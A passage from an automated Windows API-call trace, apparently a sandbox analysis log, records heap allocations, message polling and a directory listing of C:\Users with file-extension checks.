hHeap=0x2c0000) returned 1 [0183.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e00 | out: hHeap=0x2c0000) returned 1 [0183.257] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0183.258] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.269] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.269] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.269] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.270] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.270] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.270] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.270] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.270] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.270] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.270] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.270] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.270] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.270] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0183.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.270] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.270] PathFindFileNameW (pszPath="") returned="" [0183.270] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.271] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.271] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0183.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0183.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.271] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e50 | out: hHeap=0x2c0000) returned 1 [0183.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0183.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0183.272] FindFirstFileW (in: lpFileName="C:\\Users\\*" (normalized: "c:\\users\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0183.273] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.273] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0183.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0183.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42580 [0183.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0183.275] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x629b4b20, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x629b4b20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0183.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0183.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42660 [0183.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0183.276] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0183.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0183.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42628 [0183.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0183.277] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0183.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0183.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0183.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0183.282] PathFindExtensionW (pszPath="C:\\Users\\desktop.ini") returned=".ini" [0183.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0183.282] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe5b54690, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xe5b54690, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 1 [0183.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0183.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0183.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0183.283] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0183.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0183.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0183.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0183.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x498) returned 0x2adfa00 [0183.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0183.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a90 [0183.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7900 [0183.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77e8 [0183.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad78b0 [0183.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7720 [0183.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7658 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76f8 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7748 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b08 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ab8 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7bd0 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7bf8 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad78d8 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7810 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7860 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad79c8 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad79f0 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a18 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2adfeb8 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2adfef0 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2adff28 [0183.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2adff60 [0183.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0183.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0183.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0183.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad79a0 | out: hHeap=0x2c0000) returned 1 [0183.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ae0 | out: hHeap=0x2c0000) returned 1 [0183.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7888 | out: hHeap=0x2c0000) returned 1 [0183.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b58 | out: hHeap=0x2c0000) returned 1 [0183.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a68 | out: hHeap=0x2c0000) returned 1 [0183.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7db0 | out: hHeap=0x2c0000) returned 1 [0183.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7d88 | out: hHeap=0x2c0000) returned 1 [0183.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7d60 | out: hHeap=0x2c0000) returned 1 [0183.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7d38 | out: hHeap=0x2c0000) returned 1 [0183.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7d10 | out: hHeap=0x2c0000) returned 1 [0183.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ce8 | out: hHeap=0x2c0000) returned 1 [0183.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7cc0 | out: hHeap=0x2c0000) returned 1 [0183.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7c98 | out: hHeap=0x2c0000) returned 1 [0183.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7c70 | out: hHeap=0x2c0000) returned 1 [0183.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7c48 | out: hHeap=0x2c0000) returned 1 [0183.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7c20 | out: hHeap=0x2c0000) returned 1 [0183.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0183.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7770 | out: hHeap=0x2c0000) returned 1 [0183.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b80 | out: hHeap=0x2c0000) returned 1 [0183.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7838 | out: hHeap=0x2c0000) returned 1 [0183.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b30 | out: hHeap=0x2c0000) returned 1 [0183.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42580 | out: hHeap=0x2c0000) returned 1 [0183.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42660 | out: hHeap=0x2c0000) returned 1 [0183.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42628 | out: hHeap=0x2c0000) returned 1 [0183.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0183.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0183.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0183.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0183.297] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0183.297] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e00 | out: hHeap=0x2c0000) returned 1 [0183.297] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e00 [0183.298] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 